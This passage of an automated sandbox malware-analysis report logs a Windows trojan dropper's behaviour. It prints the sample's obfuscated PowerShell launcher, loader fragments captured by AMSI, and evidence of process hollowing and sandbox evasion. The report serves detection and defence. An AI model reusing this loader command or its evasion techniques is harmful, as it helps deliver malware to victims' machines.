      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
      Source: Calcifuge.exe, 00000006.00000003.2720820376.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.comT
      Source: Calcifuge.exe String found in binary or memory: https://www.google.comZ
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

      System Summary

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Calcifuge.exe
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_00404976
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_004064EC
      Source: LMSxhK1u8Z.exe Static PE information: invalid certificate
      Source: LMSxhK1u8Z.exe, 00000000.00000000.1666431914.0000000000475000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs LMSxhK1u8Z.exe
      Source: LMSxhK1u8Z.exe Binary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs LMSxhK1u8Z.exe
      Source: LMSxhK1u8Z.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal100.troj.evad.winEXE@6/15@2/2
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_0040206A CoCreateInstance
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe File created: C:\Users\user\AppData\Roaming\Polysulfonate
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe File created: C:\Users\user\AppData\Local\Temp\nsc3334.tmp
      Source: LMSxhK1u8Z.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: LMSxhK1u8Z.exe Virustotal: Detection: 72%
      Source: LMSxhK1u8Z.exe ReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe File read: C:\Users\user\Desktop\LMSxhK1u8Z.exe
      Source: unknown Process created: C:\Users\user\Desktop\LMSxhK1u8Z.exe "C:\Users\user\Desktop\LMSxhK1u8Z.exe"
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Calcifuge.exe "C:\Users\user\AppData\Local\Temp\Calcifuge.exe"
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Section loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, windows.storage.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, ntmarta.dll, apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exe Section loaded: apphelp.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: LMSxhK1u8Z.exeStatic file information: File size 1048752 > 1048576
      Source: Binary string: stem.Core.pdb@8 source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2000880429.0000000008AA9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.1985666150.00000000033A5000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000006.00000002.2918084212.0000000001805000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.2002927074.0000000009A85000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nykkerne $Polariseredes $Tornsangerens), (Electrooptics @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skiferolie = [AppDomain]::CurrentDomain.GetAssembli
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Uidentificerbare)), $Vindaloolsevejret).DefineDynamicModule($Quodlibetz, $false).DefineType($Anjelica, $Pinjen, [System.MulticastDeleg
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0504A597 push eax; iretd 1_2_0504A621
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0504E9F9 push eax; mov dword ptr [esp], edx1_2_0504EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0504CB55 push ebx; iretd 1_2_0504CB6A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC8E1 push es; iretd 1_2_098EC8E8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E503F push ds; iretd 1_2_098E505E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EAB8A push edx; iretd 1_2_098EAB51
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EAB90 push edx; iretd 1_2_098EAB51
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC352 push ecx; iretd 1_2_098EC4B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E92B6 push edi; ret 1_2_098E92B7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098ED4A6 push ebp; ret 1_2_098ED4AF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC4BA push ecx; iretd 1_2_098EC4B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E34E1 pushad ; ret 1_2_098E34F1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC47D push ecx; iretd 1_2_098EC4B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E8F92 push ss; ret 1_2_098E8F95
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E37A7 push 00000025h; retf 1_2_098E37A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EA7FC push cs; retf 1_2_098EA89E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EDFFA push edx; iretd 1_2_098EE018
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E4E25 push ebp; iretd 1_2_098E4E37
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166C352 push ecx; iretd 6_2_0166C4B8
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166A7FC push cs; retf 6_2_0166A89E
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166DFFA push edx; iretd 6_2_0166E018
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_016637A7 push 00000025h; retf 6_2_016637A9
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166AB8A push edx; iretd 6_2_0166AB51
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_01668F92 push ss; ret 6_2_01668F95
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166AB90 push edx; iretd 6_2_0166AB51
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166C47D push ecx; iretd 6_2_0166C4B8
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_01664E25 push ebp; iretd 6_2_01664E37
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166503F push ds; iretd 6_2_0166505E
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_016634E1 pushad ; ret 6_2_016634F1
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166C8E1 push es; iretd 6_2_0166C8E8
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeCode function: 6_2_0166D4A6 push ebp; ret 6_2_0166D4AF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeAPI/Special instruction interceptor: Address: 1AA96DA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6360Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3292Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exe TID: 7828Thread sleep count: 35 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exe TID: 7828Thread sleep time: -350000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: powershell.exe, 00000001.00000002.1986896418.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\^q
      Source: powershell.exe, 00000001.00000002.1986896418.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\^q
      Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: Calcifuge.exe, 00000006.00000002.2918740581.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388099706.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423966470.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446693739.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480466093.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492229148.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560467511.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503220096.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2435085911.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171207372.00000000023A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000001.00000002.1986896418.000000000587E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\^q
      Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeAPI call chain: ExitProcess graph end nodegraph_0-3121
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeAPI call chain: ExitProcess graph end nodegraph_0-3127
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Calcifuge.exe base address: 400000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Calcifuge.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Calcifuge.exe "C:\Users\user\AppData\Local\Temp\Calcifuge.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
